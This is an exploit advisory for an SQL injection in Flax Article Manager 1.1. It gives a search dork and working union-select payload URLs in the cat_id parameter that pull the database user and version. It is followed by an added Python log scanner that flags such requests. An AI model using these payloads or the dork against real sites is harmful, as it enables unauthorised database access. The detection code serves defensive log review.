Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability

2009.01.29
Credit: jiko
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-------------------------------------------------------------------------
-- JIKO FroM No-exploit.Com ---
-------------------------------------------------------------------------
# Author : jiko
# email : jalikom@hotmail.com
# Home : www.no-exploit.Com
# Script : http://www.clixint.com/products/articles -->Article Manager -->Price: $99 USD
$99*10 Dh(maroc)=990Dh=19800 Real maghribi
# Dork: Copyright 2006 © Flax Article Manager v1.1
=========================[JAWAD Cha7ta 4 ever]===================
# Exploit :
http://no-exploit.com
Demo:
http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,user(),3,4,5--
http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,version(),3,4,5-- (V 4 :) )
Top: ( R07 T9awwad ) To str0ke & Milw0rM Cyber-Zone CHof Lfo9
=========================[Thanks To Allah ]===================
Ma3aki ya GaZa
greetz : all my friend and all No-exploit members and $ cyber-zone $ leopard $ Hassin X all muslims
cyber-zone Wald Bladi B7al Khoya
-------------------------------------------------------------------------
-- JIKO FroM No-exploit.Com ---
-------------------------------------------------------------------------
------== troops of Mohamed comming inchalah =-----------------
Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc

References:

http://www.securityfocus.com/bid/33422
http://www.milw0rm.com/exploits/7862
http://secunia.com/advisories/33625
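
An added example for log review (not part of the advisory or the vendor's code): the demo requests above show cat_id carrying a plain integer in normal use, so any category.php request whose decoded cat_id is not a plain integer is worth flagging. The Combined Log Format, the sample lines, the addresses and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format, documentation IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [29/Jan/2009:10:01:02 +0000] "GET /category.php?cat_id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Jan/2009:10:02:11 +0000] "GET /category.php?cat_id=3%20and%201=0%20union%20select%200,1,version(),3,4,5-- HTTP/1.1" 200 4876 "-" "Mozilla/5.0"
192.0.2.10 - - [29/Jan/2009:10:03:40 +0000] "GET /index.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Jan/2009:10:04:05 +0000] "GET /category.php?cat_id=abc HTTP/1.1" 200 312 "-" "Mozilla/5.0"
"""

# client IP, timestamp, request target and status from one log line
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
INT_RE = re.compile(r"[0-9]+")                       # what cat_id should look like
SQL_TOKENS = re.compile(r"\b(union|select)\b|--|/\*", re.I)


def check_line(line):
    """Return a finding dict for a suspicious category.php request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith("/category.php"):
        return None
    # parse_qs URL-decodes (%20 and '+') and returns every repeated cat_id value
    values = parse_qs(url.query, keep_blank_values=True).get("cat_id", [])
    bad = [v for v in values if not INT_RE.fullmatch(v)]
    if not bad:
        return None
    reason = ("sql-tokens" if any(SQL_TOKENS.search(v) for v in bad)
              else "non-integer")
    return {"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
            "cat_id": bad, "reason": reason}


def scan(log_text):
    """Check every line of a log and collect the findings in order."""
    return [f for line in log_text.splitlines() if (f := check_line(line))]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request, as in the second sample line, means the application answered the malformed value instead of rejecting it, which is the case to investigate first.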

